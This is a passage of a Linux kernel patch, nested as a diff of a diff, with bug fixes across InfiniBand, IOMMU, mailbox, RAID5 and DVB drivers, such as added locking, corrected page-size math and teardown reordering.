+-		unsigned long sginfo_num_pages = ib_umem_num_dma_blocks(
+-			hwq_attr->sginfo->umem, hwq_attr->sginfo->pgsize);
+-
++		npages = ib_umem_num_dma_blocks(hwq_attr->sginfo->umem,
++						hwq_attr->sginfo->pgsize);
+ 		hwq->is_user = true;
+-		npages = sginfo_num_pages;
+-		npages = (npages * PAGE_SIZE) /
+-			  BIT_ULL(hwq_attr->sginfo->pgshft);
+-		if ((sginfo_num_pages * PAGE_SIZE) %
+-		     BIT_ULL(hwq_attr->sginfo->pgshft))
+-			if (!npages)
+-				npages++;
+ 	}
+ 
+ 	if (npages == MAX_PBL_LVL_0_PGS && !hwq_attr->sginfo->nopte) {
+diff --git a/drivers/infiniband/hw/bnxt_re/qplib_sp.c b/drivers/infiniband/hw/bnxt_re/qplib_sp.c
+index b802981b71716..bae7d89261439 100644
+--- a/drivers/infiniband/hw/bnxt_re/qplib_sp.c
++++ b/drivers/infiniband/hw/bnxt_re/qplib_sp.c
+@@ -584,16 +584,15 @@ int bnxt_qplib_reg_mr(struct bnxt_qplib_res *res, struct bnxt_qplib_mrw *mr,
+ 		/* Free the hwq if it already exist, must be a rereg */
+ 		if (mr->hwq.max_elements)
+ 			bnxt_qplib_free_hwq(res, &mr->hwq);
+-		/* Use system PAGE_SIZE */
+ 		hwq_attr.res = res;
+ 		hwq_attr.depth = pages;
+-		hwq_attr.stride = buf_pg_size;
++		hwq_attr.stride = sizeof(dma_addr_t);
+ 		hwq_attr.type = HWQ_TYPE_MR;
+ 		hwq_attr.sginfo = &sginfo;
+ 		hwq_attr.sginfo->umem = umem;
+ 		hwq_attr.sginfo->npages = pages;
+-		hwq_attr.sginfo->pgsize = PAGE_SIZE;
+-		hwq_attr.sginfo->pgshft = PAGE_SHIFT;
++		hwq_attr.sginfo->pgsize = buf_pg_size;
++		hwq_attr.sginfo->pgshft = ilog2(buf_pg_size);
+ 		rc = bnxt_qplib_alloc_init_hwq(&mr->hwq, &hwq_attr);
+ 		if (rc) {
+ 			dev_err(&res->pdev->dev,
+diff --git a/drivers/infiniband/hw/efa/efa_verbs.c b/drivers/infiniband/hw/efa/efa_verbs.c
+index 31454643f8c54..f9526a4c75b26 100644
+--- a/drivers/infiniband/hw/efa/efa_verbs.c
++++ b/drivers/infiniband/hw/efa/efa_verbs.c
+@@ -1397,7 +1397,7 @@ static int pbl_continuous_initialize(struct efa_dev *dev,
+  */
+ static int pbl_indirect_initialize(struct efa_dev *dev, struct pbl_context *pbl)
+ {
+-	u32 size_in_pages = DIV_ROUND_UP(pbl->pbl_buf_size_in_bytes, PAGE_SIZE);
++	u32 size_in_pages = DIV_ROUND_UP(pbl->pbl_buf_size_in_bytes, EFA_CHUNK_PAYLOAD_SIZE);
+ 	struct scatterlist *sgl;
+ 	int sg_dma_cnt, err;
+ 
+diff --git a/drivers/infiniband/hw/hns/hns_roce_hw_v2.c b/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
+index b2421883993b1..34a270b6891a9 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
++++ b/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
+@@ -4728,11 +4728,9 @@ static int modify_qp_init_to_rtr(struct ib_qp *ibqp,
+ 	mtu = ib_mtu_enum_to_int(ib_mtu);
+ 	if (WARN_ON(mtu <= 0))
+ 		return -EINVAL;
+-#define MAX_LP_MSG_LEN 16384
+-	/* MTU * (2 ^ LP_PKTN_INI) shouldn't be bigger than 16KB */
+-	lp_pktn_ini = ilog2(MAX_LP_MSG_LEN / mtu);
+-	if (WARN_ON(lp_pktn_ini >= 0xF))
+-		return -EINVAL;
++#define MIN_LP_MSG_LEN 1024
++	/* mtu * (2 ^ lp_pktn_ini) should be in the range of 1024 to mtu */
++	lp_pktn_ini = ilog2(max(mtu, MIN_LP_MSG_LEN) / mtu);
+ 
+ 	if (attr_mask & IB_QP_PATH_MTU) {
+ 		hr_reg_write(context, QPC_MTU, ib_mtu);
+@@ -5136,7 +5134,6 @@ static int hns_roce_v2_set_abs_fields(struct ib_qp *ibqp,
+ static bool check_qp_timeout_cfg_range(struct hns_roce_dev *hr_dev, u8 *timeout)
+ {
+ #define QP_ACK_TIMEOUT_MAX_HIP08 20
+-#define QP_ACK_TIMEOUT_OFFSET 10
+ #define QP_ACK_TIMEOUT_MAX 31
+ 
+ 	if (hr_dev->pci_dev->revision == PCI_REVISION_ID_HIP08) {
+@@ -5145,7 +5142,7 @@ static bool check_qp_timeout_cfg_range(struct hns_roce_dev *hr_dev, u8 *timeout)
+ 				   "local ACK timeout shall be 0 to 20.\n");
+ 			return false;
+ 		}
+-		*timeout += QP_ACK_TIMEOUT_OFFSET;
++		*timeout += HNS_ROCE_V2_QP_ACK_TIMEOUT_OFS_HIP08;
+ 	} else if (hr_dev->pci_dev->revision > PCI_REVISION_ID_HIP08) {
+ 		if (*timeout > QP_ACK_TIMEOUT_MAX) {
+ 			ibdev_warn(&hr_dev->ib_dev,
+@@ -5431,6 +5428,18 @@ out:
+ 	return ret;
+ }
+ 
++static u8 get_qp_timeout_attr(struct hns_roce_dev *hr_dev,
++			      struct hns_roce_v2_qp_context *context)
++{
++	u8 timeout;
++
++	timeout = (u8)hr_reg_read(context, QPC_AT);
++	if (hr_dev->pci_dev->revision == PCI_REVISION_ID_HIP08)
++		timeout -= HNS_ROCE_V2_QP_ACK_TIMEOUT_OFS_HIP08;
++
++	return timeout;
++}
++
+ static int hns_roce_v2_query_qp(struct ib_qp *ibqp, struct ib_qp_attr *qp_attr,
+ 				int qp_attr_mask,
+ 				struct ib_qp_init_attr *qp_init_attr)
+@@ -5508,7 +5517,7 @@ static int hns_roce_v2_query_qp(struct ib_qp *ibqp, struct ib_qp_attr *qp_attr,
+ 	qp_attr->max_dest_rd_atomic = 1 << hr_reg_read(&context, QPC_RR_MAX);
+ 
+ 	qp_attr->min_rnr_timer = (u8)hr_reg_read(&context, QPC_MIN_RNR_TIME);
+-	qp_attr->timeout = (u8)hr_reg_read(&context, QPC_AT);
++	qp_attr->timeout = get_qp_timeout_attr(hr_dev, &context);
+ 	qp_attr->retry_cnt = hr_reg_read(&context, QPC_RETRY_NUM_INIT);
+ 	qp_attr->rnr_retry = hr_reg_read(&context, QPC_RNR_NUM_INIT);
+ 
+diff --git a/drivers/infiniband/hw/hns/hns_roce_hw_v2.h b/drivers/infiniband/hw/hns/hns_roce_hw_v2.h
+index b1b3e1e0b84e5..2b4dbbb06eb56 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_hw_v2.h
++++ b/drivers/infiniband/hw/hns/hns_roce_hw_v2.h
+@@ -72,6 +72,8 @@
+ #define HNS_ROCE_V2_IDX_ENTRY_SZ		4
+ 
+ #define HNS_ROCE_V2_SCCC_SZ			32
++#define HNS_ROCE_V2_QP_ACK_TIMEOUT_OFS_HIP08    10
++
+ #define HNS_ROCE_V3_SCCC_SZ			64
+ #define HNS_ROCE_V3_GMV_ENTRY_SZ		32
+ 
+diff --git a/drivers/infiniband/hw/hns/hns_roce_mr.c b/drivers/infiniband/hw/hns/hns_roce_mr.c
+index 37a5cf62f88b4..14376490ac226 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_mr.c
++++ b/drivers/infiniband/hw/hns/hns_roce_mr.c
+@@ -33,6 +33,7 @@
+ 
+ #include <linux/vmalloc.h>
+ #include <rdma/ib_umem.h>
++#include <linux/math.h>
+ #include "hns_roce_device.h"
+ #include "hns_roce_cmd.h"
+ #include "hns_roce_hem.h"
+@@ -909,6 +910,44 @@ static int mtr_init_buf_cfg(struct hns_roce_dev *hr_dev,
+ 	return page_cnt;
+ }
+ 
++static u64 cal_pages_per_l1ba(unsigned int ba_per_bt, unsigned int hopnum)
++{
++	return int_pow(ba_per_bt, hopnum - 1);
++}
++
++static unsigned int cal_best_bt_pg_sz(struct hns_roce_dev *hr_dev,
++				      struct hns_roce_mtr *mtr,
++				      unsigned int pg_shift)
++{
++	unsigned long cap = hr_dev->caps.page_size_cap;
++	struct hns_roce_buf_region *re;
++	unsigned int pgs_per_l1ba;
++	unsigned int ba_per_bt;
++	unsigned int ba_num;
++	int i;
++
++	for_each_set_bit_from(pg_shift, &cap, sizeof(cap) * BITS_PER_BYTE) {
++		if (!(BIT(pg_shift) & cap))
++			continue;
++
++		ba_per_bt = BIT(pg_shift) / BA_BYTE_LEN;
++		ba_num = 0;
++		for (i = 0; i < mtr->hem_cfg.region_count; i++) {
++			re = &mtr->hem_cfg.region[i];
++			if (re->hopnum == 0)
++				continue;
++
++			pgs_per_l1ba = cal_pages_per_l1ba(ba_per_bt, re->hopnum);
++			ba_num += DIV_ROUND_UP(re->count, pgs_per_l1ba);
++		}
++
++		if (ba_num <= ba_per_bt)
++			return pg_shift;
++	}
++
++	return 0;
++}
++
+ static int mtr_alloc_mtt(struct hns_roce_dev *hr_dev, struct hns_roce_mtr *mtr,
+ 			 unsigned int ba_page_shift)
+ {
+@@ -917,6 +956,10 @@ static int mtr_alloc_mtt(struct hns_roce_dev *hr_dev, struct hns_roce_mtr *mtr,
+ 
+ 	hns_roce_hem_list_init(&mtr->hem_list);
+ 	if (!cfg->is_direct) {
++		ba_page_shift = cal_best_bt_pg_sz(hr_dev, mtr, ba_page_shift);
++		if (!ba_page_shift)
++			return -ERANGE;
++
+ 		ret = hns_roce_hem_list_request(hr_dev, &mtr->hem_list,
+ 						cfg->region, cfg->region_count,
+ 						ba_page_shift);
+diff --git a/drivers/infiniband/hw/irdma/verbs.c b/drivers/infiniband/hw/irdma/verbs.c
+index f6973ea55eda7..6a8bb6ed4bf43 100644
+--- a/drivers/infiniband/hw/irdma/verbs.c
++++ b/drivers/infiniband/hw/irdma/verbs.c
+@@ -522,11 +522,6 @@ static int irdma_destroy_qp(struct ib_qp *ibqp, struct ib_udata *udata)
+ 	if (!iwqp->user_mode)
+ 		cancel_delayed_work_sync(&iwqp->dwork_flush);
+ 
+-	irdma_qp_rem_ref(&iwqp->ibqp);
+-	wait_for_completion(&iwqp->free_qp);
+-	irdma_free_lsmm_rsrc(iwqp);
+-	irdma_cqp_qp_destroy_cmd(&iwdev->rf->sc_dev, &iwqp->sc_qp);
+-
+ 	if (!iwqp->user_mode) {
+ 		if (iwqp->iwscq) {
+ 			irdma_clean_cqes(iwqp, iwqp->iwscq);
+@@ -534,6 +529,12 @@ static int irdma_destroy_qp(struct ib_qp *ibqp, struct ib_udata *udata)
+ 				irdma_clean_cqes(iwqp, iwqp->iwrcq);
+ 		}
+ 	}
++
++	irdma_qp_rem_ref(&iwqp->ibqp);
++	wait_for_completion(&iwqp->free_qp);
++	irdma_free_lsmm_rsrc(iwqp);
++	irdma_cqp_qp_destroy_cmd(&iwdev->rf->sc_dev, &iwqp->sc_qp);
++
+ 	irdma_remove_push_mmap_entries(iwqp);
+ 	irdma_free_qp_rsrc(iwqp);
+ 
+@@ -3190,6 +3191,7 @@ static int irdma_post_send(struct ib_qp *ibqp,
+ 			break;
+ 		case IB_WR_LOCAL_INV:
+ 			info.op_type = IRDMA_OP_TYPE_INV_STAG;
++			info.local_fence = info.read_fence;
+ 			info.op.inv_local_stag.target_stag = ib_wr->ex.invalidate_rkey;
+ 			err = irdma_uk_stag_local_invalidate(ukqp, &info, true);
+ 			break;
+diff --git a/drivers/iommu/amd/amd_iommu.h b/drivers/iommu/amd/amd_iommu.h
+index c160a332ce339..471f40351f4c8 100644
+--- a/drivers/iommu/amd/amd_iommu.h
++++ b/drivers/iommu/amd/amd_iommu.h
+@@ -15,9 +15,7 @@ extern irqreturn_t amd_iommu_int_thread(int irq, void *data);
+ extern irqreturn_t amd_iommu_int_handler(int irq, void *data);
+ extern void amd_iommu_apply_erratum_63(struct amd_iommu *iommu, u16 devid);
+ extern void amd_iommu_restart_event_logging(struct amd_iommu *iommu);
+-extern int amd_iommu_init_devices(void);
+-extern void amd_iommu_uninit_devices(void);
+-extern void amd_iommu_init_notifier(void);
++extern void amd_iommu_restart_ga_log(struct amd_iommu *iommu);
+ extern void amd_iommu_set_rlookup_table(struct amd_iommu *iommu, u16 devid);
+ 
+ #ifdef CONFIG_AMD_IOMMU_DEBUGFS
+diff --git a/drivers/iommu/amd/init.c b/drivers/iommu/amd/init.c
+index 7c14b1d32c8db..b0af8b5967e0d 100644
+--- a/drivers/iommu/amd/init.c
++++ b/drivers/iommu/amd/init.c
+@@ -751,6 +751,30 @@ void amd_iommu_restart_event_logging(struct amd_iommu *iommu)
+ 	iommu_feature_enable(iommu, CONTROL_EVT_LOG_EN);
+ }
+ 
++/*
++ * This function restarts event logging in case the IOMMU experienced
++ * an GA log overflow.
++ */
++void amd_iommu_restart_ga_log(struct amd_iommu *iommu)
++{
++	u32 status;
++
++	status = readl(iommu->mmio_base + MMIO_STATUS_OFFSET);
++	if (status & MMIO_STATUS_GALOG_RUN_MASK)
++		return;
++
++	pr_info_ratelimited("IOMMU GA Log restarting\n");
++
++	iommu_feature_disable(iommu, CONTROL_GALOG_EN);
++	iommu_feature_disable(iommu, CONTROL_GAINT_EN);
++
++	writel(MMIO_STATUS_GALOG_OVERFLOW_MASK,
++	       iommu->mmio_base + MMIO_STATUS_OFFSET);
++
++	iommu_feature_enable(iommu, CONTROL_GAINT_EN);
++	iommu_feature_enable(iommu, CONTROL_GALOG_EN);
++}
++
+ /*
+  * This function resets the command buffer if the IOMMU stopped fetching
+  * commands from it.
+diff --git a/drivers/iommu/amd/iommu.c b/drivers/iommu/amd/iommu.c
+index 26fb78003889f..5d34416b3468d 100644
+--- a/drivers/iommu/amd/iommu.c
++++ b/drivers/iommu/amd/iommu.c
+@@ -836,6 +836,7 @@ amd_iommu_set_pci_msi_domain(struct device *dev, struct amd_iommu *iommu) { }
+ 	(MMIO_STATUS_EVT_OVERFLOW_INT_MASK | \
+ 	 MMIO_STATUS_EVT_INT_MASK | \
+ 	 MMIO_STATUS_PPR_INT_MASK | \
++	 MMIO_STATUS_GALOG_OVERFLOW_MASK | \
+ 	 MMIO_STATUS_GALOG_INT_MASK)
+ 
+ irqreturn_t amd_iommu_int_thread(int irq, void *data)
+@@ -859,10 +860,16 @@ irqreturn_t amd_iommu_int_thread(int irq, void *data)
+ 		}
+ 
+ #ifdef CONFIG_IRQ_REMAP
+-		if (status & MMIO_STATUS_GALOG_INT_MASK) {
++		if (status & (MMIO_STATUS_GALOG_INT_MASK |
++			      MMIO_STATUS_GALOG_OVERFLOW_MASK)) {
+ 			pr_devel("Processing IOMMU GA Log\n");
+ 			iommu_poll_ga_log(iommu);
+ 		}
++
++		if (status & MMIO_STATUS_GALOG_OVERFLOW_MASK) {
++			pr_info_ratelimited("IOMMU GA Log overflow\n");
++			amd_iommu_restart_ga_log(iommu);
++		}
+ #endif
+ 
+ 		if (status & MMIO_STATUS_EVT_OVERFLOW_INT_MASK) {
+@@ -2094,6 +2101,15 @@ out_err:
+ 	return NULL;
+ }
+ 
++static inline u64 dma_max_address(void)
++{
++	if (amd_iommu_pgtable == AMD_IOMMU_V1)
++		return ~0ULL;
++
++	/* V2 with 4 level page table */
++	return ((1ULL << PM_LEVEL_SHIFT(PAGE_MODE_4_LEVEL)) - 1);
++}
++
+ static struct iommu_domain *amd_iommu_domain_alloc(unsigned type)
+ {
+ 	struct protection_domain *domain;
+@@ -2110,7 +2126,7 @@ static struct iommu_domain *amd_iommu_domain_alloc(unsigned type)
+ 		return NULL;
+ 
+ 	domain->domain.geometry.aperture_start = 0;
+-	domain->domain.geometry.aperture_end   = ~0ULL;
++	domain->domain.geometry.aperture_end   = dma_max_address();
+ 	domain->domain.geometry.force_aperture = true;
+ 
+ 	return &domain->domain;
+@@ -2389,7 +2405,7 @@ static void amd_iommu_iotlb_sync(struct iommu_domain *domain,
+ 	unsigned long flags;
+ 
+ 	spin_lock_irqsave(&dom->lock, flags);
+-	domain_flush_pages(dom, gather->start, gather->end - gather->start, 1);
++	domain_flush_pages(dom, gather->start, gather->end - gather->start + 1, 1);
+ 	amd_iommu_domain_flush_complete(dom);
+ 	spin_unlock_irqrestore(&dom->lock, flags);
+ }
+@@ -3504,8 +3520,7 @@ int amd_iommu_activate_guest_mode(void *data)
+ 	struct irte_ga *entry = (struct irte_ga *) ir_data->entry;
+ 	u64 valid;
+ 
+-	if (!AMD_IOMMU_GUEST_IR_VAPIC(amd_iommu_guest_ir) ||
+-	    !entry || entry->lo.fields_vapic.guest_mode)
++	if (!AMD_IOMMU_GUEST_IR_VAPIC(amd_iommu_guest_ir) || !entry)
+ 		return 0;
+ 
+ 	valid = entry->lo.fields_vapic.valid;
+diff --git a/drivers/iommu/mtk_iommu.c b/drivers/iommu/mtk_iommu.c
+index e93ca9dc37c8e..2ae5a6058a34a 100644
+--- a/drivers/iommu/mtk_iommu.c
++++ b/drivers/iommu/mtk_iommu.c
+@@ -737,7 +737,8 @@ static void mtk_iommu_flush_iotlb_all(struct iommu_domain *domain)
+ {
+ 	struct mtk_iommu_domain *dom = to_mtk_domain(domain);
+ 
+-	mtk_iommu_tlb_flush_all(dom->bank->parent_data);
++	if (dom->bank)
++		mtk_iommu_tlb_flush_all(dom->bank->parent_data);
+ }
+ 
+ static void mtk_iommu_iotlb_sync(struct iommu_domain *domain,
+diff --git a/drivers/iommu/rockchip-iommu.c b/drivers/iommu/rockchip-iommu.c
+index a68eadd64f38d..f7e9b56be174f 100644
+--- a/drivers/iommu/rockchip-iommu.c
++++ b/drivers/iommu/rockchip-iommu.c
+@@ -1303,20 +1303,22 @@ static int rk_iommu_probe(struct platform_device *pdev)
+ 	for (i = 0; i < iommu->num_irq; i++) {
+ 		int irq = platform_get_irq(pdev, i);
+ 
+-		if (irq < 0)
+-			return irq;
++		if (irq < 0) {
++			err = irq;
++			goto err_pm_disable;
++		}
+ 
+ 		err = devm_request_irq(iommu->dev, irq, rk_iommu_irq,
+ 				       IRQF_SHARED, dev_name(dev), iommu);
+-		if (err) {
+-			pm_runtime_disable(dev);
+-			goto err_remove_sysfs;
+-		}
++		if (err)
++			goto err_pm_disable;
+ 	}
+ 
+ 	dma_set_mask_and_coherent(dev, rk_ops->dma_bit_mask);
+ 
+ 	return 0;
++err_pm_disable:
++	pm_runtime_disable(dev);
+ err_remove_sysfs:
+ 	iommu_device_sysfs_remove(&iommu->iommu);
+ err_put_group:
+diff --git a/drivers/mailbox/mailbox-test.c b/drivers/mailbox/mailbox-test.c
+index 4555d678fadda..abcee58e851c2 100644
+--- a/drivers/mailbox/mailbox-test.c
++++ b/drivers/mailbox/mailbox-test.c
+@@ -12,6 +12,7 @@
+ #include <linux/kernel.h>
+ #include <linux/mailbox_client.h>
+ #include <linux/module.h>
++#include <linux/mutex.h>
+ #include <linux/of.h>
+ #include <linux/platform_device.h>
+ #include <linux/poll.h>
+@@ -38,6 +39,7 @@ struct mbox_test_device {
+ 	char			*signal;
+ 	char			*message;
+ 	spinlock_t		lock;
++	struct mutex		mutex;
+ 	wait_queue_head_t	waitq;
+ 	struct fasync_struct	*async_queue;
+ 	struct dentry		*root_debugfs_dir;
+@@ -95,6 +97,7 @@ static ssize_t mbox_test_message_write(struct file *filp,
+ 				       size_t count, loff_t *ppos)
+ {
+ 	struct mbox_test_device *tdev = filp->private_data;
++	char *message;
+ 	void *data;
+ 	int ret;
+ 
+@@ -110,10 +113,13 @@ static ssize_t mbox_test_message_write(struct file *filp,
+ 		return -EINVAL;
+ 	}
+ 
+-	tdev->message = kzalloc(MBOX_MAX_MSG_LEN, GFP_KERNEL);
+-	if (!tdev->message)
++	message = kzalloc(MBOX_MAX_MSG_LEN, GFP_KERNEL);
++	if (!message)
+ 		return -ENOMEM;
+ 
++	mutex_lock(&tdev->mutex);
++
++	tdev->message = message;
+ 	ret = copy_from_user(tdev->message, userbuf, count);
+ 	if (ret) {
+ 		ret = -EFAULT;
+@@ -144,6 +150,8 @@ out:
+ 	kfree(tdev->message);
+ 	tdev->signal = NULL;
+ 
++	mutex_unlock(&tdev->mutex);
++
+ 	return ret < 0 ? ret : count;
+ }
+ 
+@@ -392,6 +400,7 @@ static int mbox_test_probe(struct platform_device *pdev)
+ 	platform_set_drvdata(pdev, tdev);
+ 
+ 	spin_lock_init(&tdev->lock);
++	mutex_init(&tdev->mutex);
+ 
+ 	if (tdev->rx_channel) {
+ 		tdev->rx_buffer = devm_kzalloc(&pdev->dev,
+diff --git a/drivers/md/raid5.c b/drivers/md/raid5.c
+index f787c9e5b10e7..fbef3c9badb65 100644
+--- a/drivers/md/raid5.c
++++ b/drivers/md/raid5.c
+@@ -5516,7 +5516,7 @@ static int raid5_read_one_chunk(struct mddev *mddev, struct bio *raid_bio)
+ 
+ 	sector = raid5_compute_sector(conf, raid_bio->bi_iter.bi_sector, 0,
+ 				      &dd_idx, NULL);
+-	end_sector = bio_end_sector(raid_bio);
++	end_sector = sector + bio_sectors(raid_bio);
+ 
+ 	rcu_read_lock();
+ 	if (r5c_big_stripe_cached(conf, sector))
+diff --git a/drivers/media/dvb-core/dvb_ca_en50221.c b/drivers/media/dvb-core/dvb_ca_en50221.c
+index c2d2792227f86..baf64540dc00a 100644
+--- a/drivers/media/dvb-core/dvb_ca_en50221.c
++++ b/drivers/media/dvb-core/dvb_ca_en50221.c
+@@ -151,6 +151,12 @@ struct dvb_ca_private {
+ 
+ 	/* mutex serializing ioctls */
+ 	struct mutex ioctl_mutex;
++
++	/* A mutex used when a device is disconnected */
++	struct mutex remove_mutex;
++
++	/* Whether the device is disconnected */
++	int exit;
+ };
+ 
+ static void dvb_ca_private_free(struct dvb_ca_private *ca)
+@@ -187,7 +193,7 @@ static void dvb_ca_en50221_thread_wakeup(struct dvb_ca_private *ca);
+ static int dvb_ca_en50221_read_data(struct dvb_ca_private *ca, int slot,
+ 				    u8 *ebuf, int ecount);
+ static int dvb_ca_en50221_write_data(struct dvb_ca_private *ca, int slot,
+-				     u8 *ebuf, int ecount);
++				     u8 *ebuf, int ecount, int size_write_flag);
+ 
+ /**
+  * findstr - Safely find needle in haystack.
+@@ -370,7 +376,7 @@ static int dvb_ca_en50221_link_init(struct dvb_ca_private *ca, int slot)
+ 	ret = dvb_ca_en50221_wait_if_status(ca, slot, STATUSREG_FR, HZ / 10);
+ 	if (ret)
+ 		return ret;
+-	ret = dvb_ca_en50221_write_data(ca, slot, buf, 2);
++	ret = dvb_ca_en50221_write_data(ca, slot, buf, 2, CMDREG_SW);
+ 	if (ret != 2)
+ 		return -EIO;
+ 	ret = ca->pub->write_cam_control(ca->pub, slot, CTRLIF_COMMAND, IRQEN);
+@@ -778,11 +784,13 @@ exit:
+  * @buf: The data in this buffer is treated as a complete link-level packet to
+  *	 be written.
+  * @bytes_write: Size of ebuf.
++ * @size_write_flag: A flag on Command Register which says whether the link size
++ * information will be writen or not.
+  *
+  * return: Number of bytes written, or < 0 on error.
+  */
+ static int dvb_ca_en50221_write_data(struct dvb_ca_private *ca, int slot,
+-				     u8 *buf, int bytes_write)
++				     u8 *buf, int bytes_write, int size_write_flag)
+ {
+ 	struct dvb_ca_slot *sl = &ca->slot_info[slot];
+ 	int status;
+@@ -817,7 +825,7 @@ static int dvb_ca_en50221_write_data(struct dvb_ca_private *ca, int slot,
+ 
+ 	/* OK, set HC bit */
+ 	status = ca->pub->write_cam_control(ca->pub, slot, CTRLIF_COMMAND,
+-					    IRQEN | CMDREG_HC);
++					    IRQEN | CMDREG_HC | size_write_flag);
+ 	if (status)
+ 		goto exit;
+ 
+@@ -1508,7 +1516,7 @@ static ssize_t dvb_ca_en50221_io_write(struct file *file,
+ 
+ 			mutex_lock(&sl->slot_lock);
+ 			status = dvb_ca_en50221_write_data(ca, slot, fragbuf,
+-							   fraglen + 2);
++							   fraglen + 2, 0);
+ 			mutex_unlock(&sl->slot_lock);
+ 			if (status == (fraglen + 2)) {
+ 				written = 1;
+@@ -1709,12 +1717,22 @@ static int dvb_ca_en50221_io_open(struct inode *inode, struct file *file)
+ 
+ 	dprintk("%s\n", __func__);
+ 
+-	if (!try_module_get(ca->pub->owner))
++	mutex_lock(&ca->remove_mutex);
++
++	if (ca->exit) {
++		mutex_unlock(&ca->remove_mutex);
++		return -ENODEV;
++	}
++
++	if (!try_module_get(ca->pub->owner)) {
++		mutex_unlock(&ca->remove_mutex);
+ 		return -EIO;
++	}
+ 
+ 	err = dvb_generic_open(inode, file);
+ 	if (err < 0) {
+ 		module_put(ca->pub->owner);
++		mutex_unlock(&ca->remove_mutex);
+ 		return err;
+ 	}
+ 
+@@ -1739,6 +1757,7 @@ static int dvb_ca_en50221_io_open(struct inode *inode, struct file *file)
+ 
+ 	dvb_ca_private_get(ca);
+ 
++	mutex_unlock(&ca->remove_mutex);
+ 	return 0;
+ }
+ 
+@@ -1758,6 +1777,8 @@ static int dvb_ca_en50221_io_release(struct inode *inode, struct file *file)
+ 
+ 	dprintk("%s\n", __func__);
+ 
++	mutex_lock(&ca->remove_mutex);
++
+ 	/* mark the CA device as closed */
+ 	ca->open = 0;
+ 	dvb_ca_en50221_thread_update_delay(ca);
+@@ -1768,6 +1789,13 @@ static int dvb_ca_en50221_io_release(struct inode *inode, struct file *file)
+ 
+ 	dvb_ca_private_put(ca);
+ 
++	if (dvbdev->users == 1 && ca->exit == 1) {
++		mutex_unlock(&ca->remove_mutex);
++		wake_up(&dvbdev->wait_queue);
++	} else {
++		mutex_unlock(&ca->remove_mutex);
++	}
++
+ 	return err;
+ }
+ 
+@@ -1891,6 +1919,7 @@ int dvb_ca_en50221_init(struct dvb_adapter *dvb_adapter,
+ 	}
+ 
+ 	mutex_init(&ca->ioctl_mutex);
++	mutex_init(&ca->remove_mutex);
+ 
+ 	if (signal_pending(current)) {
+ 		ret = -EINTR;
+@@ -1933,6 +1962,14 @@ void dvb_ca_en50221_release(struct dvb_ca_en50221 *pubca)
+ 
+ 	dprintk("%s\n", __func__);
+ 
++	mutex_lock(&ca->remove_mutex);
++	ca->exit = 1;
++	mutex_unlock(&ca->remove_mutex);
++
++	if (ca->dvbdev->users < 1)
++		wait_event(ca->dvbdev->wait_queue,
++				ca->dvbdev->users == 1);
++
+ 	/* shutdown the thread if there was one */
+ 	kthread_stop(ca->thread);
+ 
+diff --git a/drivers/media/dvb-core/dvb_demux.c b/drivers/media/dvb-core/dvb_demux.c
+index 83cc32ad7e122..eadd579bb4fad 100644
+--- a/drivers/media/dvb-core/dvb_demux.c
++++ b/drivers/media/dvb-core/dvb_demux.c
+@@ -115,12 +115,12 @@ static inline int dvb_dmx_swfilter_payload(struct dvb_demux_feed *feed,
+ 
+ 	cc = buf[3] & 0x0f;
+ 	ccok = ((feed->cc + 1) & 0x0f) == cc;
+-	feed->cc = cc;
+ 	if (!ccok) {
+ 		set_buf_flags(feed, DMX_BUFFER_FLAG_DISCONTINUITY_DETECTED);
+ 		dprintk_sect_loss("missed packet: %d instead of %d!\n",
+ 				  cc, (feed->cc + 1) & 0x0f);
+ 	}
++	feed->cc = cc;
+ 
+ 	if (buf[1] & 0x40)	// PUSI ?
+ 		feed->peslen = 0xfffa;
+@@ -300,7 +300,6 @@ static int dvb_dmx_swfilter_section_packet(struct dvb_demux_feed *feed,
+ 
+ 	cc = buf[3] & 0x0f;
+ 	ccok = ((feed->cc + 1) & 0x0f) == cc;
+-	feed->cc = cc;
+ 
+ 	if (buf[3] & 0x20) {
+ 		/* adaption field present, check for discontinuity_indicator */
+@@ -336,6 +335,7 @@ static int dvb_dmx_swfilter_section_packet(struct dvb_demux_feed *feed,
+ 		feed->pusi_seen = false;
+ 		dvb_dmx_swfilter_section_new(feed);
+ 	}
++	feed->cc = cc;
+ 
+ 	if (buf[1] & 0x40) {
+ 		/* PUSI=1 (is set), section boundary is here */
+diff --git a/drivers/media/dvb-core/dvb_frontend.c b/drivers/media/dvb-core/dvb_frontend.c
+index c41a7e5c2b928..fce0e20940780 100644
+--- a/drivers/media/dvb-core/dvb_frontend.c
++++ b/drivers/media/dvb-core/dvb_frontend.c
+@@ -293,14 +293,22 @@ static int dvb_frontend_get_event(struct dvb_frontend *fe,
+ 	}
+ 
+ 	if (events->eventw == events->eventr) {
+-		int ret;
++		struct wait_queue_entry wait;
++		int ret = 0;
+ 
+ 		if (flags & O_NONBLOCK)
+ 			return -EWOULDBLOCK;
+ 
+-		ret = wait_event_interruptible(events->wait_queue,
+-					       dvb_frontend_test_event(fepriv, events));
+-
++		init_waitqueue_entry(&wait, current);
++		add_wait_queue(&events->wait_queue, &wait);
++		while (!dvb_frontend_test_event(fepriv, events)) {
++			wait_woken(&wait, TASK_INTERRUPTIBLE, 0);
++			if (signal_pending(current)) {
++				ret = -ERESTARTSYS;
++				break;
++			}
++		}
++		remove_wait_queue(&events->wait_queue, &wait);
+ 		if (ret < 0)
+ 			return ret;
+ 	}
+diff --git a/drivers/media/dvb-core/dvb_net.c b/drivers/media/dvb-core/dvb_net.c
+index 8a2febf33ce28..8bb8dd34c223e 100644
+--- a/drivers/media/dvb-core/dvb_net.c
++++ b/drivers/media/dvb-core/dvb_net.c
+@@ -1564,15 +1564,43 @@ static long dvb_net_ioctl(struct file *file,
+ 	return dvb_usercopy(file, cmd, arg, dvb_net_do_ioctl);
+ }
+ 
++static int locked_dvb_net_open(struct inode *inode, struct file *file)
++{
++	struct dvb_device *dvbdev = file->private_data;
++	struct dvb_net *dvbnet = dvbdev->priv;
++	int ret;
++
++	if (mutex_lock_interruptible(&dvbnet->remove_mutex))
++		return -ERESTARTSYS;
++
++	if (dvbnet->exit) {
++		mutex_unlock(&dvbnet->remove_mutex);
++		return -ENODEV;
++	}
++
++	ret = dvb_generic_open(inode, file);
++
++	mutex_unlock(&dvbnet->remove_mutex);
++
++	return ret;
++}
++
+ static int dvb_net_close(struct inode *inode, struct file *file)
+ {
+ 	struct dvb_device *dvbdev = file->private_data;
